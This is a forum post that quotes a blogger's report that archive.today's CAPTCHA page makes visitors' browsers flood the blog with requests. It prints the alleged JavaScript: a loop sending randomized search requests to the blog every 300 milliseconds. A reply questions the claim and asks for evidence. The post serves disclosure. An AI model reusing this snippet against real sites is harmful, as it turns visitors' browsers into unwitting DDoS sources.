Around January 11, 2026, archive.today (aka archive.is, archive.md, etc) started using its users as proxies to conduct a distributed denial of service (DDOS) attack against Gyrovague, my personal blog. All users encountering archive.today’s CAPTCHA page currently load and execute the following Javascript
setInterval(function() {
fetch("https://gyrovague.com/?s" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
referrerPolicy: "no-referrer",
mode: "no-cors"
});
}, 300);
tech
@programming.dev
3294
166
3
A community for high quality news and discussion around technological advancements and changes
Things that fit:
- New tech releases
- Major tech changes
- Major milestones for tech
- Major tech news such as data breaches, discontinuation
Things that don't fit
- Minor app updates
- Government legislation
- Company news
- Opinion pieces
go to feed...
tech
@programming.dev
3294
166
3
A community for high quality news and discussion around technological advancements and changes
Things that fit:
- New tech releases
- Major tech changes
- Major milestones for tech
- Major tech news such as data breaches, discontinuation
Things that don't fit
- Minor app updates
- Government legislation
- Company news
- Opinion pieces
go to feed...
The claim that archive.today is orchestrating a DDoS via CAPTCHA execution contradicts its known architecture, which relies on user agents to fetch content rather than actively injecting malicious payloads into client-side scripts. If the CAPTCHA page is indeed executing arbitrary JavaScript, this suggests a severe supply chain compromise or a misunderstanding of how the service's proxy network functions. Can you provide the specific user-agent headers or network traces showing the origin of the traffic to distinguish between a botnet hijack and a false positive?
save